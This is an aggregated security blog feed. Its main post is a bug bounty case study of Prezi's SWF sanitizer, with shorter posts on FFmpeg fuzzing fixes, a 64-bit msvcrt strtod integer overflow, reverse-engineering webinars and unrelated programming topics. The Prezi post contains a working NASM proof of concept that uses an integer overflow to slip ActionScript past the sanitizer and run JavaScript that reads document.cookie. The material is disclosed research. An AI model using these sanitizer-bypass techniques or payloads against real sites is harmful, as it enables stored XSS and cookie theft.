Integer overflow into XSS and other fun stuff - a case study of a bug bounty

By Gynvael Coldwind | Thu, 27 Mar 2014 00:08:53 +0100 | @domain:
Some time ago I decided to spend a few evenings playing with bug bounties. I've looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise with digging into the internals of SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to get everyone into context: Prezi ( is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both online service and storage, and a desktop version which basically is just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as Prezi Bug Bounty Program goes, you can read all about it at I'll just add that everything (communication, fixing bugs, etc) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed for any parts that contain ActionScript or import other SWF files - this is done to prevent executing user's (attacker's) code. As soon as the SWF is clean, it gets loaded into the Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk based format. Each chunk starts with a header (and the data follows), that looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk: [ 0x3f ][ tag ID (10 bits) ][ data size (32 bits) ]

Both the formats of the chunks and the tag IDs are defined in "SWF File Format Specification" released by Adobe. As of today the current version is 19 updated April 23, 2013, and as to be expected, it has "only" 243 pages. There are currently 94 tag IDs defined (from 0 to 93, with a couple missing, e.g. ID 92 or ID 79-81), with some of them being just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).

As mentioned, the scrubbing basically went after the chunks which might lead to code execution - if such chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So basically embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable at that).

The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is an overkill. What you want to do is to remove the actions alone and that requires more code and digging deeper into the format, making the simple solution more complex.

On a more general note: using blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk removing code I notice the following code:

private static function skipTag(param1:ByteArray) : void
var _loc_2:* = getTagLengthAndSkipHeader(param1);
param1.position = param1.position + _loc_2;
}// end function

The red line retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a a 32-bit value, and the returned type is uint.

The yellow line does basically an addition assignment to basically skip past the chunk-that-is-OK in the data stream. The param1.position is also uint according to AS documentation.

You know here this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high level perspective (in pseudocode; I'll omit code added after patching previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
if Tag at SWF.position is in blacklist {

The skipTag was already shown above, so that leaves just the eraseTag method:

old_position ← SWF.position
temp_buffer ← new ByteArray()
SWF.position ← old_position
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.

The above allows us to basically jump backwards into a middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course leads to changing how the Adobe Flash SWF interpreter will see the file, which is different than how the sanitizer originally saw it.

Let's look at an example:

So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which described a tag which is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just second chunk's data) has a huge length which sends the sanitizer to EOF and so the sanitizer exits.
  • When the Adobe Flash SWF parsers sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tags data, and ignores is (ShowFrame has no meaningful data from SWF parsers perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed and it's not. For some reason incorrect size causes Flash to ignore any ActionScript (I never got into the bottom of why exactly is this happening though; though it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).

The final setup looked like this (in the data of the hidden junks the sanitizer was sent to EOF of course):

The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0

; SWF file

; ----------------------- HEADERS
db "FWS"
db 6 ; version 6

dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
dw (%2 | %1 <<6)

%macro TAG_LONG 2
dw (0x3f | %1 << 6)
dd .end - ($ + 4)

dw (0x3f | %1 << 6)
dd %2

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
db 0x83
dw .StringsEnd1 - ($ + 2) ; Size
db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
db '" '
; It's here. Well, send it back to the void or something.
db 0x3f ; Long tag size. (it's actually '?')
db ':' ; Tag ID. Whatever.
db ' ' ; 0x20202020 - this should be enough to get rid of it for good.
db '" + ' ; And were done here.
; Let's continue were we left, shall we?
db "document.cookie);", 0
db "", 0 ; _blank
.ActionsEnd: db 0 ; EndOfAction Flag

TAG_SHORT TAG_ShowFrame, 0

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so no sense thinking too much about it I guess; especially that it worked:

Again, I would classify this as a stored/wormable XSS.

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV key from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from * (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because AES in CBC mode works like this:
  1. Take the next 16-byte block.
  2. Decrypt the block using AES KEY and AES algorithm.
  3. XOR the result with the 16-byte IV and that's the decrypted block.
  4. GOTO 1 until end of data.
So basically:
  1. The we know the result of the decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So, basically, we choose the result of the decryption of the first block* (and get trashed data in all the other blocks).
* - actually, if we think of the data as 16-byte rows, then we control one byte in each column, in a row of our choice; all bytes don't have to be in the same row.

There are a couple of important things to note:
  • The IV gives us only 16-bytes to control.
  • Doing some AES key brute forcing it might be possible to control additionally 2-5 bytes - however the time to get the additional bytes grows exponentially - it's 256**N operations (AES decryptions) basically, where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of padding length (e.g. 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroy. This can be bypassed by choosing such an IV, that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and opensource SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from process' (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Video recording of my Data, data, data! reverse-engineering webinar

By Gynvael Coldwind | Wed, 19 Mar 2014 00:08:51 +0100 | @domain:
As you probably know, we've run into some serious technical problems during the webinar (who would suspect a hangouts outage, huh), which caused both a 40 minute delay, changing the platform and some minor problems on the line (like lack of recording). So, as promised, I did record the talk again and I've just posted it on YouTube, to be enjoyed by everyone who couldn't see the live one, or decided to wait for the video for other reasons (the technical problems being a good one).

Context: please refer to this post.

"Data, data, data! I can't make bricks without clay." A few practical notes on reverse-engineering.

Direct YouTube link: click

The talk was done as part of Garage4Hackers Ranchoddas Series.

Slides: here
Scripts, etc: here

Once again sorry for the technical issues during the live talk.
Let me know what you think about the talk (questions are welcome as well) :)


C++ symbols in debian/symbols files - symbol export maps

By sil2100 | Mon, 17 Mar 2014 20:04:00 GMT | @domain:
When developing a C++ library that we later intend to provide by means of a Debian package, there are certain things that make it really complicated and hard to maintain. Everyone that had to deal with debian/symbols in a C++ library knows how troublesome it is. The biggest problem besides name mangling: symbols leakage. By default the GNU ELF linker exports everything as it goes, leading to maintenance hell. Sadly, this has to be dealt with on the source level - the best way? Symbol export maps.

A free webinar on Reverse Engineering

By Gynvael Coldwind | Tue, 11 Mar 2014 00:08:48 +0100 | @domain:
Next week I will be doing a free webinar on Reverse Engineering - "Data, data, data! I can't make bricks without clay."*. I will focus on practical RE tips and tricks I'm using day-to-day, which generally speed up the whole process or are simply cool (imo). The webinar will be hosted by Garage4Hackers as part of the Ranchoddas Series; see the details below.

Title: "Data, data, data! I can't make bricks without clay."* Few practical notes on reverse-engineering.
* Sir Arthur Conan Doyle, The Adventure of the Copper Beeches (one of the Sherlock Holmes short stories)

Date: 17 March 2014
Time (Switzerland/EU aka UTC+01:00 aka CET aka GMT +1:00): 18:00
Time (IST aka GMT +5:30): 22:30
Time (other places):
Duration: TBD, but something between 45-60 minutes + time for questions

Video stream: or
Questions / chat: #g4h @ (or via web:

Registration link: click
(We will be sending out the video link via e-mail, once we have it - probably just before the webinar; we'll also post that link on G4H forum/facebook/twitter + probably around here.)

The presentation will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool - most of it can be applied on any architecture or operating system.

Examples of topics:
- how to start with an unknown architecture
- debugger scripting
- creating your own useful tools
- etc

- some reverse-engineering experience or general interest in reverse-engineering
- basic programming skills
- basic knowledge of how the CPU and operating systems work

garage4hackers ranchoddas sersier poster

Big thanks to Garage4Hackers Team for organizing this!

Let me know if you are planning to attend and see you there :)

My first ever podcast in English - solving Binathlon 400 CTF crackme

By Gynvael Coldwind | Mon, 17 Feb 2014 00:08:47 +0100 | @domain:
As some of you may know, I've published a little over a hundred podcasts in my native language and it seems I finally got around to try and record something in English. The podcast is about one of the solutions (and a lazy one at that) to the "HackMe" Binathlon 400 task (it was basically a ZX Spectrum crackme) from the Olympic CTF Sochi 2014 run by the MSLC.

I hope you'll enjoy the video. Feel free to ask any questions (ideally in the YouTube comments) with regards to the task that you have.

If you like the idea of me recording podcasts on security, reverse-engineer and programming related topic, let me know - I might make a habit out of it.

Node.js gamepad driver

By xa | Sat, 01 Feb 2014 22:25:00 GMT | @domain:

Node.js gamepad in action

Some time ago I wanted to play an old-school game and I wanted to use my gamepad, and of course I could not find it. The solution? Create my own gamepad, but with limited hardware related skills that would be a little bit difficult. The next best thing - to use an touch capable device. But it turned out quite quickly that it would not be so easy. It’s not a problem when the HTML5 gamepad controls an HTML5 game on the same server/browser, but what about native games? A driver would be needed for that and my level of expertise in that area was the same as the level in hardware bulding mumbo-jumbo. My experimental “driver” had two main goals: to run on ubuntu and be build in node.js

The following Post is not a tutorial, so I’m not covering the subject from top to bottom, but I’m providing, a great starting point. This should give you some idea how things work and what to expect from such a device. At the end I’m linking to a Node.js application which acts like a device driver. This app is not in any way a production ready solution, but only an experiment, so keep in mind that there are many bugs, and that there is a high posibility that it will not run on your system (I’ve created it and tested only on Ubuntu 13.10)

Fun with antigravity

By xa | Tue, 28 Jan 2014 22:00:00 GMT | @domain:

Some time ago, I needed a simple crowd algorithm for a project of mine. In that project there was a bunch of entities, which were moving towards a common target. Everything was alright until those entities were close to the target and each other - every entity was placed at the target at the same point. I've tried to implement some collision detection for every entity, so if one entity detected that it is colliding with another one, it would stop moving and wait for the second entity to go away. But, when there would be multiple entities in close proximity - then almost everyone would wait for everyone.

The solution for a simple, almost dumb crowd simulation was very close. Every enitity, instead of stoping and waiting, should apply a revese force which would depend on the proximity to a near entity. That approach is the opposite effect to gravity - antigravity.

The result of this algorithm can be seen above, with some presets for particle behaviors from a "crowd", "jelly" to "bacteria". Such a simple solution can create a great range of posibilities. Of course this is not near a full blown crowd simulation with advanced agent AI, but for my small project, the antigravity did a great job.

Appmenu Qt5: patches and the release candidate

By sil2100 | Tue, 14 Jan 2014 16:29:00 GMT | @domain:
Happy new year! I hope this post to be the last one in the series of 'Appmenu for Qt5'. Holidays have passed and now all my required patches have been successfully merged to upstream Qt repositiories. This means that according to our current policy, we can now cherry-pick those patches to the Qt5 versions that are used in Ubuntu. Therefore, the still-prepared Ubuntu Qt 5.2 packages are already shipping my changes as quilt patches, enabling proper appmenu-qt5 support. All is ready for testing.

FFmpeg and a thousand fixes

By j00ru | Fri, 10 Jan 2014 16:44:13 +0000 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog). Following more than two years of work, the day has finally came – the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project […]

FFmpeg and a thousand fixes

By Gynvael Coldwind | Fri, 10 Jan 2014 00:08:44 +0100 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog).
Following more than two years of work, the day has finally came - the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project thus far:

$ git log | grep Jurczyk | grep -c Coldwind

As this event clearly marks an important day in our ongoing fuzzing effort, we decided to provide you with some background on one of the activities we are currently working on.

FFmpeg repository logs with a logs of Found-by: j00ru and Gynvael

At Google, security is a top priority -- not only for our own products, but across the entire Internet. That’s why members of the Google Security Team and other Googlers frequently perform audits of software and report the resulting findings to the respective vendors or maintainers, as shown in the official “Vulnerabilities - Application Security” list. We also try to employ the extensive computing power of our data centers in order to solve some of the security challenges by performing large-scale automated testing, commonly known as fuzzing.

Back in December 2011 we were really inspired by Tobias Klein, his "Bug Hunter's Diary" book and specifically the "NULL POINTER FTW" section discussing the discovery and exploitation process of a write-what-where condition vulnerability identified by the author in one of the FFmpeg demuxers responsible for parsing 4X Media ("4xm" in short), with its source code residing in the "libavformat/4xm.c" source file. The security flaw was not difficult to find through manual analysis, since the affected code was contained within several continuous lines of text; while it was just a single example of a trivial programming error, it got us thinking. After all, if there was a simple vulnerability in a C module of less than 400 lines of code performing a relatively simple task, chances were there could have been more similar or less obvious problems in the entire FFmpeg codebase, currently at about 832,000 lines of code (and definitely with more than 0.5MLOC back at the time).

While reading about the 4xm demuxer vulnerability, we thought that we could help FFmpeg eliminate many potential low-hanging problems from the code by making use of the Google fleet and fuzzing infrastructure we already had in place. There were also several other reasons why we decided that taking the project as a fuzzing target would be a good idea:
  • FFmpeg had a history of reliability and security issues prior to Tobias' discovery, see FFmpeg Security website.
  • Feeding input to the software and triggering relevant code paths was as trivial as using the standalone ffmpeg executable with appropriate command line options.
  • The project was strictly about parsing complex, often proprietary file format structures in native C code - essentially, a paradise for any bug hunter. There were lots of dynamic allocations, arithmetic operations, indexing buffers based on input data, moving memory around and other operations known to be frequently prone to various types of programming mistakes. As a bonus, different parsing modules were developed by different contributors, typically with varying security awareness.
  • Input data was readily available - the internet was full of audio/video files in a variety of formats and encoded with different codecs. There were also dedicated corpuses of files designed to be used for media decoder testing. Two examples of such data sets are and the FFmpeg FATE project.
  • Roughly at the same time the Google-developed AddressSanitizer run-time memory error detector was gaining recognition. The utility offered instant and accurate detection of common classes of memory-related problems such as out-of-bounds read and write access to {stack, heap, static} arrays, use-after-free, invalid free, double free and more, at the cost of a 2-3x average slow down and some insignificant memory overhead. The utility seemed to be a perfect candidate for improving the detection rate of fuzzing-incurred errors which would otherwise not be detected at all or would manifest themselves in areas of code completely unrelated to the root cause location.
  • As a bonus, the ASan team decided to make it compatible with FFmpeg at early stages of the development and later ran the ASan-instrumented FFmpeg over a set of valid input files (not malformed or mutated in any way). Only by doing this, they were able to identify four bugs (see "Found Bugs"), providing us with more evidence that the codebase might require further investigation in search of programming errors in dealing with incorrectly formatted input bitstreams.
All of the above arguments discuss how the nature of FFmpeg made it suitable for automated testing, but there is also the matter of whether finding and having bugs fixed in the product is worthwhile, or precisely, who would benefit from the improved security posture of the project. FFmpeg and its derivatives (such as the spin-off Libav project) are the foundation of many other media-processing programs used both by desktop PC users and companies alike. For a fairly comprehensive list of products built upon, relying on or using parts of FFmpeg, see; notable examples include Google Chrome, MPlayer, VLC and xine. As a result, it was expected that any discovered and fixed bug would make millions of users directly or indirectly more secure, being enough of a justification to proceed and take the effort from idea to realization.

Before any fuzzing actually takes place, it is usually crucial for the success of the operation to gather a set of files with extensive code coverage, so that more (potentially unexpected) program states can be triggered during the fuzzing itself, spinned off the original coverage. We approached the problem by collecting around 7,000 sample media files from the aforementioned website and the FFmpeg FATE regression test suite, later adding more exotic files from the public web in order to further improve the subset of formats and codecs covered by the corpus. Once we were finally happy with the total number of basic blocks touched while processing the test cases (being a good measure of the total code coverage achieved), we made use of some 2,000 cores and relatively simple algorithms (such as bitflipping, swapping bytes, truncating the files and so forth) to mutate the input data, feed it to FFmpeg and save information about any resulting crashes.

The first fuzzing iteration ran for approximately one week and was able to uncover around 130 unique problems in the code, ranging from simple assertion failures to stack-based buffer overflows and other severe conditions:
  • NULL pointer dereferences,
  • Invalid pointer arithmetic leading to SIGSEGV due to unmapped memory access,
  • Out-of-bounds reads and writes to stack, heap and static-based arrays,
  • Invalid free() calls,
  • Double free() calls over the same pointer,
  • Division errors,
  • Assertion failures,
  • Use of uninitialized memory.
Our personal feeling is that between 10% and 20% of the problems could be considered easily exploitable security issues; however, the estimation has not been formally confirmed in any way.

We subsequently contacted the project maintainer - Michael Niedermayer - who submitted the first fix on the 24th of January, 2012 (see commit c77be3a35a0160d6af88056b0899f120f2eef38e). Since then, we have carried out several dozen fuzzing iterations (each typically resulting in less crashes than the previous ones) over the last two years using similar resources, occasionally improving our original corpus and tweaking the mutation configuration (e.g. fiddling with mutation ratios or getting them to match the internal structure of the tested files). Ever since we started the effort, we have been working closely with Michael, who has been extremely keen to work with us and fix all issues we would send his way. The numbers speak for themselves - out of over thousand commits submitted to FFmpeg as fixes to our findings, at least 750 were authored by Michael, which gives an outstanding average of one commit each single day for the last 23 months! We would like to thank him for all the work he has done and continues to do to improve the stability and security of the product; finding the bugs is just the start of a success.

The other ~350 commits in FFmpeg were mostly submitted by Libav project developers: Ronald S. Bultje, Luca Barbato, Alex Converse, Martin Storsjö and Anton Khirnov. We have been concurrently reporting issues in Libav during the last several months and similarly to FFmpeg, the maintainers are doing a great job writing and submitting patches, which FFmpeg is also cherry-picking to their own git repository (large chunks of the two projects are shared, as Libav started as a fork of FFmpeg). While the former project is doing their best to catch up with the latter, the figures speak for themselves again: there are "only" 413 commits tagged "Jurczyk" or “Coldwind” in Libav, so even though some of the FFmpeg bugs might not apply to Libav, there are still many unresolved issues there which are already fixed in FFmpeg. Consequently, we advise users to use the FFmpeg upstream code where possible, or the latest stable version (currently 2.1.1) otherwise. It is also a good idea to carefully consider which formats and codecs are necessary for your use case and disable all other parsers during compilation time, in order to reduce the attack surface to a minimum.

We are presently still improving our corpus and fuzzing methods and will continue to work with both FFmpeg and Libav to ensure the highest quality of the software as used by millions of users behind multiple media players. If interested in the effort, please keep an eye on the master branches for commits marked as "Found by Mateusz "j00ru" Jurczyk and Gynvael Coldwind" and watch out for new stable versions of the software packages. Hopefully, one day we will be able to declare both project "fuzz clean" against most publicly available samples and simple mutation algorithms. Until then, we recommend to refrain from using either of the two projects to process untrusted media files or alternatively to use privilege separation on your PC or production environment, where absolutely required.

Complete lists of developers who have ever submitted patches for bugs we identified in FFmpeg and Libav are shown below (sorted by the number of commits). They clearly illustrate that as of today, FFmpeg includes virtually all fixes developed for Libav, while Libav only has 50 out of a total of 750 Michael's commits (as previously mentioned, not all FFmpeg bugs affect Libav in the first place, though).

    750 Michael Niedermayer
108 Ronald S. Bultje
91 LucaBarbato
77 Martin Storsjö
48 Anton Khirnov
29 AlexConverse
5 Kostya Shishkov
4 Thilo Borgmann
1 VitorSessak
1 Reinhard Tartler
1 Paul B Mahol
1 MashiatSarker Shakkhar
1 Mans Rullgard
1 Justin Ruggles
1 Janne Grunau
1 Aurelien Jacobs
    107 Ronald S. Bultje
89 Luca Barbato
77 Martin Storsjö
50 Michael Niedermayer
48 Anton Khirnov
27 Alex Converse
5 Kostya Shishkov
2 Thilo Borgmann
1 Vitor Sessak
1 Reinhard Tartler
1 Paul B Mahol
1 Mashiat Sarker Shakkhar
1 Mans Rullgard
1 Justin Ruggles
1 Janne Grunau
1 Aurelien Jacobs
We would like to thank all of the above developers for their hard work on making both media libraries better with every single day.

English version of my ZIP-format slides

By Gynvael Coldwind | Wed, 04 Dec 2013 00:08:43 +0100 | @domain:
Ange reminded me that I never published the English version of the slides from my "Ten Thousand Traps: ZIP, RAR, etc" talk. I gave the talk in May this year, in Krakow, on a small Polish conference called SEConference. Apart from the slides there are also several "weird" ZIP examples, including a "schizophrenic" (as Ange calles them - and it's an accurate and easy to remember name), which seems to contain different files while viewing it under various ZIP parsers/libraries/unpackers (see slides 24 to 27 for results).

Download links:

the slides (2.8 Mb)
the weird zips (14 Kb)

I don't have this talk recorded in English, but you can see the demos in the recording of my Polish talk (in Polish) - see below.

• DEMO 1 at 2:00 - Unreal Commander exploit (ZIP unpack path traversal into DLL spoofing due to wrong directory privileges).
• DEMO 2 at 12:23 - viewed from Python, PHP and Java.
• DEMO 3 at 18:18 - File names in ZIP, exploit from DEMO 1 explained.
• DEMO 4 at 21:15 - Files with same name in ZIP.
• DEMO 5 at 26:10 - Memory content disclosure in Unreal Commander.

And that's it.

P.S. If you're into ZIP files, you might want to check out the Android "Master Key" bug (and other) - just google for it.

Windows msvcr*.dll 64-bit strtod endptr integer overflow

By Gynvael Coldwind | Sat, 23 Nov 2013 00:08:41 +0100 | @domain:
Some time ago I was reading a random Python JSON parsing library which was partly implemented in C. At one point I thought I spotted a bug in custom float number parsing - I've written a short PoC to trigger it and it worked (i.e. crashed Python), but behaved differently than I expected it to and seemed to work only on Windows. So I got back to looking at the code and in the end decided it was only my imagination - there was no bug. So… why did that PoC actually work? It turned out that in some cases the library fell back to using the good-old strtod for float parsing instead and yes, there was a bug - in the underlying msvcrt.dll strtod implementation.


  • The strtod/et al. (string-to-double) has a char **endptr output parameter, in which it stores the address of the next character after the parsed/converted-to-double number in the input buffer. This parameter is used by parsers to determine where to continue parsing after a number has been read.
  • Since internally strtod (or actually _fltin2 and _wfltin2 which are used deep inside) uses a 32-bit int type to store the number-of-parsed-characters, the final calculation of endptr (startptr + number-of-parsed-characters) may result in an address that is outside (in front) of the input text buffer on 64-bit systems.
  • This results in introducing DoS class, information leak class, or other types of bugs in parsers that rely on strtod and the endptr parameter.

Note: Both glibc and MinGW (statically linked) strtod implementation don't have this bug - it's msvcr*.dll specific.
Note 2: PoCs are at the bottom.

Root cause

Direct problem is in the _flt structure used by _fltin2 and _wfltin2 functions, which are used to do the actual string-to-double conversion in strtod/etc (see Affected versions and functions below). This structure looks as follows (Visual C++ CRT source code, file \crt\src\fltintrn.h):

typedef struct _flt
int flags;
int nbytes; /* number of characters read */
long lval;
double dval; /* the returned floating point number */
} *FLT;

This causes problems with overly long numbers on 64-bit platforms, since the nbytes might overflow (for numbers of length >= 2GB and < 4GB, etc), which leads to it having a negative or zero value.

This is problematic for strtod/et al., since they calculate the *endptr value in the following way (\crt\src\strtod.c):

struct _flt answerstruct;
FLT answer;
answer = _fltin2( &answerstruct, ptr, _loc_update.GetLocaleT());

if ( endptr != NULL )
*endptr = (char *) ptr + answer->nbytes;

A reasonably common way to use strtod in parsers (think: a JSON/XML/CSV/etc parser) is to do something like this:

if (looks_like_a_double(p)) {
char *ep;
val = strtod(p, &ep);
// errno checking / usage of val here
p = *ep;

This in fact leads to p pointing outside of the buffer (up to 2GB in front of the buffer) and the parsing continues there.


Since this is a low-level library function the impact depends on what is it used for. Here are a couple of examples (assuming that strtod is part of a parser that is passed untrusted input, e.g. a JSON or CSV file):
  • Infinite loop DoS - if the input string is 4 GB long, the result end pointer will be identical as the start pointer, so the parser will jump into an infinite loop (strtod doesn't report any errors of course, since the number is correctly parsed)
  • Crash DoS - setting end pointer so that it points to an unallocated memory (e.g. for a number of length 2GB the end pointer will be start pointer minus 2GB, which probably points to some unallocated memory or isn't even a canonical pointer)
  • Information disclosure - since you could redirect the "read pointer" of the parser to any buffer in memory that is on lower addresses than the start pointer, you could make it read arbitrary data from memory; if the read data would be later reflected back, you could fetch it back.
  • Other - there might be other, less probable (but still possible) examples; one would be a more complicated scenario where the parsed text (code) is verified beforehand, and then parsed and executed. In such case this bug could be used to redirect the parser to jump into e.g. a middle of the string/comment containing unsafe code (similar to jumping in the middle of an instruction in ROP, but on scripting language level). This would make an awesome CTF challenge, but I don't expect it to be found in real products.

Affected versions and functions

64-bit Windows only.

This has been confirmed on:
  • default, fully patched Windows 7 msvcrt.dll
  • msvcr90.dll, msvcr110.dll
  • newest Visual Studio 2013 redistributables msvcr120.dll
  • Windows 8.1 (preview) default msvcrt.dll
I guess we can extrapolate this to "all 64-bit versions".

Affected functions (generally: everything that directly or indirectly uses _flt.nbytes for anything meaningful):
  • _fltin2/_wfltin2 - these incorrectly calculate the _flt.nbytes
  • _strtod_l/_wcstod_l - these directly use _flt.nbytes
  • strtod/wcstod - these are just wrappers for the above functions
